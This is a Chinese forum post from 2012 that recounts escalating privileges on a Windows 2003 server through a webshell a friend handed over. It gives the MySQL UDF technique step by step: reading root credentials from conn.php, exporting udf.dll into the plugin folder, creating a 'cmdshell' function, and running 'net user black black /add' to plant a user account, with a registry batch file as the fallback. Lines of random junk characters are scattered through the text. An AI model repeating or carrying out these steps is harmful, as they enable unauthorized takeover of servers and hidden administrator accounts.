朋友丢了一个webshell让我提权...我无聊就进去逛了下!全部是asp的...而且权限小的可怜几乎什么也做不了!
7 B8 ?3 J4 {( s; a4 p. ~7 u* ?; t0 h2 _& x1 @' Y
于是无聊在D盘乱翻!终于看见一个php的网站!寻找conn.php竟然意外发现是root权限!. h b& o' [! X! B; P
# G: ?) T$ @/ E) c3 H8 b; t- H2 u哈哈.小兴奋一下.立即上传udf.dll.php提权!因为是Mysql5.1版本且服务器是windows2003的
7 z* ^% k) i5 G1 U" g$ b# g) }6 j% n, U8 x' [6 S& x2 {
因此导入到以下路径:C:\\Windows\\udf.dll [显示导出成功]!6 l# V/ x6 Z0 b" i( z0 P3 }
) m5 |6 U f% F8 I4 R8 n
继续执行命令:create function cmdshell returns string soname 'udf.dll'9 H+ X; h: L+ [) q- o0 O# q
: S' V- u2 s7 Y: d9 z
杯具出现了:Can't open shared library 'udf.dll'
! m1 l8 p8 h7 V* ?4 }- K2 I% ~
" `+ H/ e: D- ]" T) _" F于是乎又满天的找解决办法.现与大家一起分享:$ ~: N! z/ @, p: g) i" @
5 e q1 e! t5 M1 G9 U- m: G从MYSQL 5.1版本开始必须要把udf.dll文件放到MYSQL安装目录下的lib\plugin文件夹下才能创建自定义函数,并且该目录默认是不存在的,这就需要我们使用webshell找到MYSQL的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录即可。
9 d3 |8 ]6 T5 k- B; N/ H7 n3 w, _7 M1 `: g$ h
OK,问题解决了!准备添加用户:select cmdshell('net user black black /add');
. _& b! x. V& Z5 z9 Z& U* H% o0 m7 v& ^7 F3 @% Z7 a
又一次杯具的失败了!摸索原因才知道服务器管理员禁止.Net.exe和Net1.exe了!( Y: W. g) Q. x- R: O- G0 P$ y
/ o2 i- w9 J* T* L3 v/ W0 M0 M
但是意外的发现可以执行其他命令!, O4 F; O" t# @' `; m
8 d- |. ?/ s) q
于是乎写了一个bat文件,通过注册表来完成下面的工作![遇见问题一定要全方位多思考.通过其他思路寻找突破]
, a* D; G$ c! ~' ~; N |
发表于 2012-11-1 13:31:52
收藏
支持
反对